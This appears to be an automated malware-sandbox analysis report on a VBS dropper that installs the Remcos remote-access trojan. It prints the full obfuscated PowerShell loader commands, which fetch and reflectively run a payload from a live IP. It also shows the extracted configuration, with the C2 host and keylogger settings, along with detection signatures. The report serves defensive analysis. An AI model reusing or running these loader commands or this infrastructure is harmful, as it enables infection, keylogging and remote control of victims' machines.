                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 3644, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: A1 F4 A6 31 3F 06 0E 87 BA 2A 33 4C 42 68 88 64 3D 39 A2 ED C7 26 57 06 CB F8 5B 6C 40 10 41 A6 43 6A C8 3A A7 AB 3C BC 2C AE D1 64 97 A9 5F 30 BB B7 F0 A5 71 3D 93 82 69 B5 BF 60 BC 47 1B 9C 15 02 AF FB 99 83 0D 18 6F E7 FF 01 B9 7C 45 7B 1D 95 60 E7 C0 20 A7 38 3F 26 5F 3E 1B 34 94 11 A1 4C 9A 63 D7 72 37 E5 4F A7 C2 D6 A6 78 BA C8 CF 27 4F A8 2E 58 58 D2 EC CB AA AD 40 27 36 80 70 D3 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:22.318836+010020204251Exploit Kit Activity Detected52.217.196.57443192.168.2.749747TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:22.318836+010020204241Exploit Kit Activity Detected52.217.196.57443192.168.2.749747TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:23.714286+010020365941Malware Command and Control Activity Detected192.168.2.749759190.9.223.1354576TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:22.752887+010020576351A Network Trojan was detected52.217.196.57443192.168.2.749747TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:24.973348+010028033043Unknown Traffic192.168.2.749769178.237.33.5080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T09:36:22.752887+010028582951A Network Trojan was detected52.217.196.57443192.168.2.749747TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txtAvira URL Cloud: Label: malware
                  Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txtAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["remcosnov24.duckdns.org:4576:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0883UG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Multi AV Scanner detection for submitted file
                  Source: sostener.vbsReversingLabs: Detection: 21%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_0043293A
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_aa758384-0

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406764 _wcslen,CoGetObject,15_2_00406764
                  Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFAAC48AD53h7_2_00007FFAAC48ACE5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFAAC48D8A6h7_2_00007FFAAC48D808

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49759 -> 190.9.223.135:4576
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.217.196.57:443 -> 192.168.2.7:49747
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.217.196.57:443 -> 192.168.2.7:49747
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: remcosnov24.duckdns.org
                  Potential dropper URLs found in powershell memory
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in memory: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: remcosnov24.duckdns.org
                  Uses ping.exe to check the status of other devices and networks
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.7:49759 -> 190.9.223.135:4576
                  Source: global trafficHTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM